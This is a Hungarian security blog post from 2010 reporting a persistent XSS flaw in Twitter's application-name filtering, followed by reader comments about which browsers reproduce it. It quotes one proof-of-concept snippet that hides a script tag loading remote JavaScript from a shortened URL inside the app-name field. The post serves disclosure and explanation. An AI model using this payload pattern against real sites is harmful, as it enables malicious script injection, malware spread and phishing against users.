Egy 0wn3d_5ys becenevet használó - feltehetően indonéz - Twitter felhasználó perzisztens XSS sebezhetőséget talált a Twitteren. A problémát egy tavaly nyilvánosságra kerülthöz nagyon hasonló hiba okozza. Múlt évben James Salter a Twitter alkalmazásokhoz beállítható URL sszűrésében talált hibát, most pedig az alkalmazás nevének szűrését sikerült kijátszani. Ezen az olvalon részletesen elemzik a bemutatott PoC kódot, a leglényegesebb ez a kódrészlet:
<span>via <a href="hxxp://www.0wn3d-5ys.co.cc" rel="nofollow">Ub­erTwi­tter<span style="visibility: hidden"> <script src='hxxp://is.gd/cWO66' type='text/javascript'></script></a> </span>
A hiba egyebek mellett lehetőséget különböző kártékony kódok terjesztésére a Twitteren keresztül, valamint megkönnyíti az adathalász támadások kivitelezését is.
Syr Wullam 2010.06.25. 08:59:35
P.S. Safari 5.0 (6533.16) alatt nem tapasztalható ilyesmi.
buherator · http://buhera.blog.hu 2010.06.25. 11:51:28
Viccet féretéve: nem tudom mi lehet a baj, FF és Chrome alatt OK minden, de már láttam olyat, hogy HTML enkódolt szöveg lefutott egy böngészőben...
gergogyerek 2010.06.25. 17:56:04
buherator · http://buhera.blog.hu 2010.06.25. 18:14:06
Syr Wullam 2010.06.25. 22:13:55
FYI, itt a video:
mammutmail.com/?action=download&sid=817813903857ad4ee4d1fc212aa9ea54
Amúgy a bug inkább a NNW-ben lehet (mint írtam, Safari alatt nem tudtam reprodukálni), ami nem Apple termék, szóval Uncle Jobsnak hiába is szólnék.
A blogodat meg nagyra értékelem, azért olvasom. ;-)
gergogyerek 2010.06.26. 10:57:10